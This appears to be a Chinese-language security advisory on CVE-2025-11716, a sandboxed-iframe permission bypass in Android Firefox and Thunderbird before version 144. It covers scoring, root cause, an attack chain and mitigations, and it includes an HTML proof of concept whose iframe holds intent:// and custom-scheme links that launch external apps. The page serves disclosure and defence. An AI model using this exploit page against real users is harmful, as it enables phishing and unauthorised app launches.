CVE-2025-11716 Firefox/Thunderbird 沙盒iframe权限绕过漏洞

漏洞信息

漏洞编号

CVE-2025-11716

漏洞类型

安全策略绕过（权限绕过）

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Mozilla Firefox、Mozilla Thunderbird（Android平台）

漏洞概述

CVE-2025-11716是Mozilla Firefox和Thunderbird浏览器中存在的一个安全策略绕过漏洞，于2025年10月14日由Mozilla安全团队披露。该漏洞主要影响Android平台上的Firefox 144之前版本和Thunderbird 144之前版本。漏洞的核心问题在于，当网页中嵌入沙盒化（sandboxed）的iframe时，其中的链接可以绕过Android系统要求的"allow-"权限机制，直接调用外部应用程序。这一缺陷破坏了浏览器沙盒安全模型的设计初衷，使得恶意攻击者能够通过精心构造的网页内容，在用户不知情或未明确授权的情况下，利用iframe中的链接触发外部Android应用的启动。

根据CVSS 3.1评分系统，该漏洞的综合评分为6.5分，属于中危级别。攻击向量为网络（AV:N），攻击复杂度低（AC:L），无需特殊权限（PR:N），但需要用户交互（UI:R）。在影响方面，该漏洞对机密性影响较低（C:L），对完整性影响较高（I:H），对可用性无影响（A:N）。该漏洞由Mozilla安全团队（[email protected]）发现并报告，已在Firefox 144和Thunderbird 144版本中修复，同时发布了mfsa2025-81和mfsa2025-84两个安全公告进行详细说明。

技术细节

该漏洞的技术原理涉及浏览器iframe沙盒机制与Android应用间通信（IPC）权限控制的交互缺陷。在Web标准中，iframe的sandbox属性用于对嵌入内容施加额外的安全限制，包括限制脚本执行、表单提交、弹出窗口等。当iframe设置了sandbox属性但未明确指定allow-popups-to-escape-sandbox等权限时，理论上不应允许iframe内的内容触发外部应用启动。

然而，在Firefox和Thunderbird的Android版本实现中，存在权限检查不完整的问题。当用户点击沙盒iframe中的链接时，浏览器未能正确验证该操作是否需要"allow-"权限前缀（如allow-popups），导致Android系统层面的Intent分发机制被绕过。具体而言，攻击者可以构造一个包含自定义scheme（如intent://、myapp://等）的URI链接，将其嵌入到带有sandbox属性的iframe中。当Android用户点击该链接时，浏览器会将Intent直接传递给Android系统，从而启动对应的外部应用程序，整个过程绕过了正常的权限检查流程。

利用方式相对简单：攻击者只需创建一个恶意网页，其中嵌入带有sandbox属性的iframe，在iframe内容中放置一个使用Android Intent URI的自定义链接。当受害者访问该网页并点击链接时，即可在未经明确授权的情况下触发目标应用的启动。这种攻击可能导致钓鱼应用启动、隐私数据泄露或其他恶意行为。

攻击链分析

STEP 1

步骤1：构造恶意网页

攻击者创建一个包含沙盒化iframe的恶意网页，iframe内容中包含使用Android Intent URI或自定义scheme的链接。

STEP 2

步骤2：诱导用户访问

攻击者通过钓鱼邮件、社交媒体或其他方式诱导Android用户使用Firefox或Thunderbird（版本低于144）访问该恶意网页。

STEP 3

步骤3：用户点击链接

用户在恶意网页中点击沙盒iframe内的链接，触发浏览器的链接处理流程。

STEP 4

步骤4：绕过权限检查

由于漏洞存在，Firefox/Thunderbird未能正确执行sandbox属性的权限检查，未要求'allow-popups-to-escape-sandbox'权限。

STEP 5

步骤5：启动外部应用

Android系统的Intent分发机制被触发，对应的外部应用程序被启动，可能导致钓鱼、数据窃取或其他恶意行为。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-11716 PoC: Sandbox iframe permission bypass on Android Firefox/Thunderbird -->
<!-- This PoC demonstrates how a sandboxed iframe can open external apps without proper 'allow-' permissions -->

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CVE-2025-11716 PoC</title>
</head>
<body>
    <h1>Malicious Page (Attacker Controlled)</h1>
    <p>Click the link below to trigger the vulnerability:</p>

    <!-- The sandboxed iframe contains a link that can open an external Android app -->
    <!-- Without proper 'allow-popups' or 'allow-popups-to-escape-sandbox', this should be blocked -->
    <!-- But due to CVE-2025-11716, the external app launches anyway -->
    <iframe
        sandbox="allow-scripts"
        src="malicious_iframe.html"
        style="width: 600px; height: 200px; border: 1px solid red;">
    </iframe>

    <!-- malicious_iframe.html content (loaded in sandboxed iframe): -->
    <!--
    <!DOCTYPE html>
    <html>
    <body>
        <h2>Sandboxed Content</h2>
        <a href="intent://#Intent;scheme=myapp;package=com.example.targetapp;S.browser_fallback_url=https://example.com;end">
            Click here (triggers external app on vulnerable Firefox < 144)
        </a>
        <a href="myapp://action/steal_data?param=value">
            Alternative: Direct custom scheme link
        </a>
    </body>
    </html>
    -->
</body>
</html>

影响范围

Mozilla Firefox < 144（Android）

Mozilla Thunderbird < 144（Android）

防御指南

临时缓解措施

在无法立即升级的情况下，建议用户暂时避免在Android版Firefox或Thunderbird中访问不可信的网页链接，特别是包含iframe嵌入内容的页面。同时可考虑使用Firefox Focus等替代浏览器，或暂时禁用JavaScript以降低风险。组织管理员应尽快评估受影响的Firefox/Thunderbird部署，并制定紧急升级计划，将浏览器更新至144及以上版本以彻底修复该权限绕过漏洞。